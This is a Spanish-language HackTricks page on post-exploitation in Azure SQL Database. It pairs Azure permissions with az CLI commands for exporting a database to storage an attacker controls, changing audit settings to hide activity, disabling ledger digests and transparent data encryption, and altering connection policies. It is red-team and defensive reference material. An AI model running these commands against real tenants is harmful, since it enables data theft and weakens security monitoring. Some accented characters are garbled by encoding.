Az - SQL Database Post Exploitation
Tip
Aprende y practica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Apoya a HackTricks
- Consulta los subscription plans!
- 脷nete al 馃挰 Discord group o al telegram group o s铆guenos en Twitter 馃惁 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud github repos.
SQL Database Post Exploitation
Para m谩s informaci贸n sobre SQL Database consulta:
Microsoft.Sql/servers/databases/read, Microsoft.Sql/servers/read && Microsoft.Sql/servers/databases/write
Con estos permisos, un atacante puede crear y actualizar bases de datos dentro del entorno comprometido. Esta actividad de post-explotaci贸n podr铆a permitir a un atacante agregar datos maliciosos, modificar configuraciones de la base de datos o insertar puertas traseras para una mayor persistencia, potencialmente interrumpiendo operaciones o habilitando acciones maliciosas adicionales.
# Create Database
az sql db create --resource-group <resource-group> --server <server-name> --name <new-database-name>
# Update Database
az sql db update --resource-group <resource-group> --server <server-name> --name <database-name> --max-size <max-size-in-bytes>
Con estos permisos (Microsoft.Sql/servers/read && Microsoft.Sql/servers/databases/write) puedes restaurar una base de datos eliminada:
az sql db restore \
--dest-name <new_database_name> \
--name <original_database_name> \
--resource-group <resource_group> \
--server <server_name> \
--deleted-time "<deleted_time_ISO_format>"
Microsoft.Sql/servers/elasticPools/write && Microsoft.Sql/servers/elasticPools/read
Con estos permisos, un atacante puede crear y actualizar elasticPools dentro del entorno comprometido. Esta actividad de post-explotaci贸n podr铆a permitir a un atacante agregar datos maliciosos, modificar configuraciones de bases de datos o insertar puertas traseras para una mayor persistencia, lo que podr铆a interrumpir las operaciones o habilitar acciones maliciosas adicionales.
# Create Elastic Pool
az sql elastic-pool create \
--name <new-elastic-pool-name> \
--server <server-name> \
--resource-group <resource-group> \
--edition <edition> \
--dtu <dtu-value>
# Update Elastic Pool
az sql elastic-pool update \
--name <elastic-pool-name> \
--server <server-name> \
--resource-group <resource-group> \
--dtu <new-dtu-value> \
--tags <key=value>
Microsoft.Sql/servers/auditingSettings/read && Microsoft.Sql/servers/auditingSettings/write
Con este permiso, puedes modificar o habilitar la configuraci贸n de auditor铆a en un Azure SQL Server. Esto podr铆a permitir a un atacante o usuario autorizado manipular las configuraciones de auditor铆a, potencialmente cubriendo sus huellas o redirigiendo los registros de auditor铆a a una ubicaci贸n bajo su control. Esto puede obstaculizar la monitorizaci贸n de seguridad o permitir que se mantenga un seguimiento de las acciones. NOTA: Para habilitar la auditor铆a para un Azure SQL Server utilizando Blob Storage, debes adjuntar una cuenta de almacenamiento donde se puedan guardar los registros de auditor铆a.
az sql server audit-policy update \
--server <server_name> \
--resource-group <resource_group_name> \
--state Enabled \
--storage-account <storage_account_name> \
--retention-days 7
Microsoft.Sql/locations/connectionPoliciesAzureAsyncOperation/read, Microsoft.Sql/servers/connectionPolicies/read && Microsoft.Sql/servers/connectionPolicies/write
Con este permiso, puedes modificar las pol铆ticas de conexi贸n de un servidor SQL de Azure. Esta capacidad puede ser explotada para habilitar o cambiar la configuraci贸n de conexi贸n a nivel de servidor.
az sql server connection-policy update \
--server <server_name> \
--resource-group <resource_group_name> \
--connection-type <Proxy|Redirect|Default>
Microsoft.Sql/servers/databases/export/action
Con este permiso, puedes exportar una base de datos de un Azure SQL Server a una cuenta de almacenamiento. Un atacante o usuario autorizado con este permiso puede exfiltrar datos sensibles de la base de datos export谩ndola a una ubicaci贸n que controlan, lo que representa un riesgo significativo de violaci贸n de datos. Es importante conocer la clave de almacenamiento para poder realizar esto.
az sql db export \
--server <server_name> \
--resource-group <resource_group_name> \
--name <database_name> \
--storage-uri <storage_blob_uri> \
--storage-key-type SharedAccessKey \
--admin-user <admin_username> \
--admin-password <admin_password>
Microsoft.Sql/servers/databases/import/action
Con este permiso, puedes importar una base de datos en un Azure SQL Server. Un atacante o usuario autorizado con este permiso puede potencialmente subir bases de datos maliciosas o manipuladas. Esto puede llevar a obtener control sobre datos sensibles o a incrustar scripts o triggers da帽inos dentro de la base de datos importada. Adicionalmente, puedes importarlo a tu propio servidor en Azure. Nota: El servidor debe permitir que los servicios y recursos de Azure accedan al servidor.
az sql db import --admin-user <admin-user> \
--admin-password <admin-password> \
--name <target-database-name> \
--server <azure-sql-server-name> \
--resource-group <resource-group-name> \
--storage-key-type SharedAccessKey \
--storage-key <storage-account-key> \
--storage-uri `https://<storage-account-name>.blob.core.windows.net/bacpac-container/MyDatabase.bacpac`
Microsoft.Sql/servers/connectionPolicies/write && Microsoft.Sql/servers/connectionPolicies/read
Con estos permisos, un usuario puede modificar y recuperar las pol铆ticas de conexi贸n de un servidor Azure SQL. Estos permisos permiten a alguien cambiar c贸mo los clientes se conectan al servidor, eligiendo entre m茅todos como redirecci贸n o proxy, lo que podr铆a ser explotado para debilitar la seguridad, redirigir el tr谩fico o interceptar datos sensibles si se configura incorrectamente.
az sql server conn-policy update \
--resource-group <resource_group> \
--server <server_name> \
--connection-policy <policy>
Microsoft.Sql/servers/keys/write && Microsoft.Sql/servers/keys/read
Con estos permisos, un usuario puede actualizar y recuperar claves de cifrado asociadas con un Azure SQL Server. Estas claves se utilizan a menudo para asegurar datos sensibles a trav茅s del cifrado, por lo que manipularlas podr铆a comprometer la seguridad de los datos al permitir la descifrado no autorizado o cambios en la rotaci贸n de claves.
az sql server key create \
--resource-group MyResourceGroup \
--server MyServer \
--kid "https://mykeyvault.vault.azure.net/keys/mykey/1234567890abcdef
Microsoft.Sql/servers/databases/ledgerDigestUploads/disable/action, Microsoft.Sql/locations/ledgerDigestUploadsAzureAsyncOperation/read, Microsoft.Sql/locations/ledgerDigestUploadsOperationResults/read
Este permiso permite deshabilitar el Ledger Digest para una base de datos de Azure SQL, lo que detiene la carga peri贸dica de registros de resumen criptogr谩fico en Azure Blob Storage que verifica la integridad de los datos.
az sql db ledger-digest-uploads disable \
--name ledgerDB \
--resource-group myResourceGroup \
--server my-sql-server
Microsoft.Sql/servers/databases/transparentDataEncryption/write, Microsoft.Sql/locations/transparentDataEncryptionAzureAsyncOperation/read, Microsoft.Sql/servers/databases/transparentDataEncryption/read
Este permiso permite a un usuario autorizado o atacante habilitar, deshabilitar o modificar la configuraci贸n de Cifrado de Datos Transparente (TDE) en una base de datos de Azure SQL, lo que podr铆a afectar la seguridad de los datos al alterar las configuraciones de cifrado.
az sql db tde set \
--database <database-name> \
--resource-group <resource-group-name> \
--server <server-name> \
--status <Enabled|Disabled>
Tip
Aprende y practica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Apoya a HackTricks
- Consulta los subscription plans!
- 脷nete al 馃挰 Discord group o al telegram group o s铆guenos en Twitter 馃惁 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud github repos.
HackTricks Cloud

